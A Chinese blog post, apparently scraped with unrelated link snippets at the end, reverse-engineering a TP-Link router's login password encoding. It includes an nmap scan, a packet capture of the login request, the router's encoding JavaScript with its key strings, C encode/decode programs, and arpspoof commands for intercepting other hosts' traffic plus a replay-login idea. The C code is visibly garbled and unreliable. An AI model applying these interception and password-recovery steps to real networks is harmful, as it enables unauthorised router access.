探寻TP-Link路由器的登录验证
提示:该案例仅供学习使用,切勿滥用!!!
查找路由器连接地址
查找ip
$ ifconfig
enp2s0: flags=<UP,BROADCAST,RUNNING,MULTICAST> mtu
inet 192.168.100.100 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::d4ed:7daa:b8d3:c4c8 prefixlen scopeid 0x20<link>
ether :d7:f6:d7::ff txqueuelen (Ethernet)
RX packets bytes (27.4 KiB)
RX errors dropped overruns frame
TX packets bytes (49.2 KiB)
TX errors dropped overruns carrier collisions
lo: flags=<UP,LOOPBACK,RUNNING> mtu
inet 127.0.0.1 netmask 255.0.0.0
inet6 :: prefixlen scopeid 0x10<host>
loop txqueuelen (Local Loopback)
RX packets bytes (142.8 KiB)
RX errors dropped overruns frame
TX packets bytes (142.8 KiB)
TX errors dropped overruns carrier collisions
wlp3s0: flags=<UP,BROADCAST,RUNNING,MULTICAST> mtu
inet 192.168.0.101 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80:::76a8:1fe8:cd16 prefixlen scopeid 0x20<link>
ether f0::8c:cd:: (Ethernet)
RX packets bytes (6.2 MiB)
RX errors dropped overruns frame
TX packets bytes (1.7 MiB)
TX errors dropped overruns carrier collisions
可以发现,无线是连接的192.168.0.101,用nmap扫描一下地址段
$ nmap Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-06 10:31 CST Nmap scan report for 192.168.0.1 Host is up (.0036s latency). Not shown: filtered ports PORT STATE SERVICE /tcp open http /tcp open upnp Nmap scan report for 192.168.0.101 Host is up (.000064s latency). Not shown: closed ports PORT STATE SERVICE /tcp open netbios-ssn /tcp open microsoft-ds Nmap scan report for 192.168.0.102 Host is up (.034s latency). All scanned ports on 192.168.0.102 are closed Nmap scan report for 192.168.0.107 Host is up (.018s latency). All scanned ports on 192.168.0.107 are closed Nmap IP addresses ( hosts up) scanned in 23.75 seconds
通过上述发现,有开启Http 服务的地址仅仅只有192.168.0.1,测试后发现,果然是这个地址
尝试输入密码,进行抓包,查看是否可以直接获取到
密码输入123456
通过抓包发现,密码是被加密的,例如:
{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}
整段tcpdump
$
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlp3s0, link-type EN10MB (Ethernet), capture size bytes
:::8c:cd::
................e...(......
:: > + PTR? )
E..HtV@.@.D....e........4l..............101.0.168.192.in-addr.arpa.....
:: > + PTR? )
E..Hv.@.@.B_...e.......5.4...............101.0.168.192.in-addr.arpa.....
:: > + PTR? )
E..F{N@.@.=....e........2N..............1.0.168.192.in-addr.arpa.....
:: > , win , options [mss ,sackOK,TS val ecr ,nop,wscale ], length
E..<..@.@.....e.....t.P...i......r..+.........
............
:: > , win , options [mss ,sackOK,TS val ecr ,nop,wscale ], length
E..<|.@.@.<s...e.....v.P..(......r............
............
:: > , win , options [nop,nop,TS val ecr ], length
E....@.@.....e.....t.P...j..~p....C!.....
........
:: > , win , options [nop,nop,TS val ecr ], length
E..|.@.@.<z...e.....v.P..).L/......;.....
........
:: > , win , options [mss ,sackOK,TS val ecr ,nop,wscale ], length
E..<Em@.@.s....e.......P..........r.Ya.........
............
:: > , win , options [nop,nop,TS val ecr ], length
E..4En@.@.s....e.......P.....
......Y}.....
........
:: > :, ack , win , options [nop,nop,TS val ecr ], length : HTTP: POST / HTTP/1.1
E..6Eo@.@.q....e.......P.....
.............
........POST / HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length:
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://192.168.0.1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}
10:42:03.742580 IP 192.168.0.101.57504 > 192.168.0.1.http: Flags [.], ack 165, win 237, options [nop,nop,TS val 4211916582 ecr 83817926], length 0
查找路由器的加密算法
通过搜索,自己探测,发现加密算法在class.js中:
其加密语句为:
其中,密码为a
this.orgAuthPwd = function(a) {
return this.securityEncode(a, "RDpbLfCPsJZ7fiv", "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW")
};
this.securityEncode = function(a, c, b) {
var d = "",
e, f, g, h, k = 187,
m = 187;
f = a.length;
g = c.length;
h = b.length;
e = f > g ? f: g;
for (var l = 0; l < e; l++) m = k = 187,
l >= f ? m = c.charCodeAt(l) : l >= g ? k = a.charCodeAt(l) : (k = a.charCodeAt(l), m = c.charCodeAt(l)),
d += b.charAt((k ^ m) % h);
return d
};
将上述javascript改为用C语言实现加密以及解密
加密
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main() {
int L_PassWd , L_Secret_Ket , L_Encrypted_string;
// 待加密的字符串
";
// 自己理解为秘钥和加密串
char Secret_key[] = "RDpbLfCPsJZ7fiv";
char Encrypted_string[] = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW";
, m = ;
L_PassWd = strlen(PassWd);
L_Secret_Ket = strlen(Secret_key);
L_Encrypted_string = strlen(Encrypted_string);
int e;
e = L_PassWd > L_Secret_Ket ? L_PassWd : L_Secret_Ket;
int l;
;l<e;l++) {
m = k = ;
if ( l >= L_PassWd ) {
m = Secret_key[l];
} else {
if ( l >= L_Secret_Ket ) {
k = PassWd[l];
} else {
k = PassWd [l];
m = Secret_key[l];
}
}
printf("%c" , (Encrypted_string[k ^ m] % L_Encrypted_string));
}
printf("\n");
;
}
执行效果
$ gcc SecurityEncode.c $ ./a.out 0KcgeXhc9TefbwK $
解密(仅仅写了用户密码长度不大于秘钥长度的),代码未优化
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main() {
// 加密后的字符串
char Encryption_String[] = "0KcgeXhc9TefbwK";
// 自己理解为秘钥和加密串
char Secret_key[] = "RDpbLfCPsJZ7fiv";
char Encrypted_string[] = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW";
char a1;
// 如果用户输入的登录密码长度小于等于秘钥长度,则按照秘钥来解析
if (strlen(Encryption_String) == strlen(Secret_key)) {
printf ("是根据秘钥来生成的加密后的密码\n");
int l , j ;
;
;l<strlen(Secret_key);l++) {
isok = ;
;j<strlen(Encrypted_string);j++) {
if (Encrypted_string[j] == Encryption_String[l]) {
&& (j ^ Secret_key[l]) < ) {
printf ("%c " , j ^ Secret_key[l]);
isok = ;
}
}
}
) {
break;
}
printf ();
printf("\n");
}
// 如果用户输入的登录密码长度小于等于秘钥长度,则按照用户来解析
} else {
printf ("是根据用户自己的密码来生成的,改天再来");
}
;
}
执行效果
$ gcc DecryptCode.c $ ./a.out 是根据秘钥来生成的加密后的密码 W J ; ( 第1个值的密码计算完毕 C J 第2个值的密码计算完毕 第3个值的密码计算完毕 o 第4个值的密码计算完毕 第5个值的密码计算完毕 - 第6个值的密码计算完毕 $
总结
默认情况下,tcpdump只能抓自己主机的数据包,要想实现在局域网内对其他机器进行抓包,则需要使用arp欺骗(不要被对方察觉了,不然干死你咋办),使用方法:
开启转发 $ $ sudo sysctl -p 截获数据包 $ arpspoof -i eth1 -t host gw $ arpspoof -i eth1 -t gw host
换个角度想,假设我们已经有这个密码密文了,还需要将密文解析成明文么,我觉得没有必要,直接模拟http do请求就可以了吧
探寻TP-Link路由器的登录验证的更多相关文章
- Linux登录验证机制、SSH Bruteforce Login学习
相关学习资料 http://files.cnblogs.com/LittleHann/linux%E4%B8%AD%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E8%AE% ...
- ThinkPHP之登录验证
验证方面写的不是很完整,正在完善当中 <?php /** * Created by dreamcms. * User: Administrator * Date: 2016/9/5 * Time ...
- 搭建开发框架Express,实现Web网站登录验证
NodeJS学习笔记(一)——搭建开发框架Express,实现Web网站登录验证 JS是脚本语言,脚本语言都需要一个解析器才能运行.对于写在HTML页面里的JS,浏览器充当了解析器的角色.而对于需 ...
- Asp.NetMVC利用LigerUI搭建一个简单的后台管理详解(函登录验证)
上一篇 Asp.Net 中Grid详解两种方法使用LigerUI加载数据库数据填充数据分页 了解了LigerUI 中Grid的基本用法 现在结合上一篇的内容做一个简单的后台管理,当然也有前台的页面 ...
- [转载:Q1mi]Bootstrap和基于Bootstrap的登录验证示例
转载自:Q1mi Bootstrap介绍 Bootstrap是Twitter开源的基于HTML.CSS.JavaScript的前端框架. 它是为实现快速开发Web应用程序而设计的一套前端工具包. 它支 ...
- Python_socket常见的方法、网络编程的安全注意事项、socketsever模块、浏览器中在一段时间记录用户的登录验证机制
1.socket常见的方法 socket_常见方法_服务器端 import socket from socket import SOL_SOCKET,SO_REUSEADDR sk = socket. ...
- ASP.NET MVC5入门3之登录验证
参考: HTML页面模版: http://www.ui.cn/detail/70262.html(第38个) MVC后台代码参考: http://www.oschina.net/p/nfine 开发环 ...
- Spring 笔记 -06- 从 MySQL 建库到 登录验证数据库信息(maven)
Spring 笔记 -06- 从 MySQL 建库到 登录验证数据库信息(maven) 本篇和 Spring 没有什么关系,只是学习 Spring,必备一些知识,所以放在这里了. 本篇内容: (1)M ...
- 2-功能1:基于用户认证组件和Ajax实现登录验证(图片验证码)
1.登录页面的设计 (1)label标签的id属性 label标签的id属性,点击label标记,相当于点击了input框 bootstarp样式 class="form-group&quo ...
随机推荐
- 爬虫 2 XPath 和 pyquery
XPath 1.常用规则 表达式 描述 nodename 选取此节点的所有子节点 / 从当前节点选取直接子节点 // 从当前节点选取子孙节点 . 选取当前节点 .. 选取当前节点的父节点 @ 选 ...
- CNN中feature map、卷积核、卷积核个数、filter、channel的概念解释,以及CNN 学习过程中卷积核更新的理解
具体可以看这篇文章,写的很详细.https://blog.csdn.net/xys430381_1/article/details/82529397
- tcp,Socket,三次握手和四次挥手的图示
tcp的图示: Socket的图示: Socket原理图示: “三次握手”图示介绍: 客户端向服务器发送一个SYN J 服务器向客户端响应一个SYN K,并对SYN J进行确认ACK J+1 客户端再 ...
- day46 前端基础HTML5+CSS3
编辑器 pycharm,sublime,hbuild,webstorm,atom 前端概念 广义:用户能看见并且交互的显示页面 狭义:运行在浏览器上的页面 学习的语言 html5 => (h5架 ...
- Apache Flink 分布式运行时环境
Tasks and Operator Chains(任务及操作链) 在分布式环境下,Flink将操作的子任务链在一起组成一个任务,每一个任务在一个线程中执行.将操作链在一起是一个不错的优化:它减少了线 ...
- 关于逻辑回归是否线性?sigmoid
from :https://www.zhihu.com/question/29385169/answer/44177582 逻辑回归的模型引入了sigmoid函数映射,是非线性模型,但本质上又是一个线 ...
- 模拟退火算法-旅行商问题-matlab实现
整理一下数学建模会用到的算法,供比赛时候参考食用. —————————————————————————————————————————— 旅行商问题(TSP): 给定一系列城市和每对城市之间的距离,求 ...
- iOS socket常用数据类型转换
int -> data /** int -> data */ + (NSData *)intToData:(int)value { Byte byte[4] = {}; byte[0] = ...
- Spring Cloud+Dubbo对Feign进行RPC改造
因为Spring Cloud Feign是基于Http Restful的调用,在高并发下的性能不够理想(虽然他是基于Ribbon以及带有熔断机制,可以防止雪崩),成为性能瓶颈,所以我们今天对Feign ...
- Centos 7创建一个服务
首先创建服务文件 vim /etc/systemd/system/node.service #内容如下 [Unit] Description=ethereum-go Monitor Daemon Af ...